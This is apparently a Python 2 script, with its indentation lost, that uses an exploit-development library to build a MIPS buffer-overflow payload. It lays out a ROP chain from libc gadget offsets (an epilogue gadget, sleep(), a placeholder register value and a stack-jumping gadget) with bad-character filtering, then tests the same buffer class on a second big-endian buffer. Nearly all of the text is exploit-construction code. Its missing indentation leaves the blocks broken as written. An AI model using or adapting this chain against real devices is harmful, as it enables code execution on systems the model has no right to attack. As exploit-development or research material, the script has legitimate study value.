libc_base=0
if qemu:
libc_base=libc_qemu_base
else:
libc_base=libc_actual_base
badchars=['\0',0x0d,'\n',0x20]
buf=EmptyOverflowBuffer(LittleEndian,default_base=libc_base,badchars=badchars,maxlength=2048)
buf.add_pattern(528)
#function_epilogue_rop
buf.add_rop_gadget(0x31b44,
description="[$ra] function epilogue that sets up $s1-$s7")
buf.add_pattern(620-buf.len())
#address of sleep
buf.add_rop_gadget(0x506c0,
description="Address of sleep() in libc. be sure to set up $ra and $a0 before calling.")
buf.add_pattern(628-buf.len())
#placeholder address that can be dereferenced without crashing, this goes in $s2
buf.add_rop_gadget(0x427a4,
description="[$s2] placeholder, derefed without crashing.")
buf.add_pattern(644-buf.len())
#stackjumber. jalr $s0
buf.add_rop_gadget(0x1ffbc,description="[$s0] stackjumper")
buf2=EmptyOverflowBuffer(BigEndian,badchars=['A','B','6'])
try:
buf2.add_pattern(128)
except Exception as e:
logger.LOG_WARN("Failed to add section.")
logger.LOG_WARN(str(e))
try:
buf2.add_string('A'*128)
except Exception as e:
logger.LOG_WARN("Failed to add section.")
logger.LOG_WARN(str(e))
try:
buf2.add_rop_gadget(0x4dc46fa0)
except Exception as e:
logger.LOG_WARN("Failed to add section.")
logger.LOG_WARN(str(e))
try:
buf2.add_pattern(1024-buf2.len())
except Exception as e:
logger.LOG_WARN("Failed to add section.")
logger.LOG_WARN(str(e))
logger.LOG_INFO("Length of second empty overflow buffer: %d" % buf2.len())
buf2.print_section_descriptions()
print buf2.pretty_string()
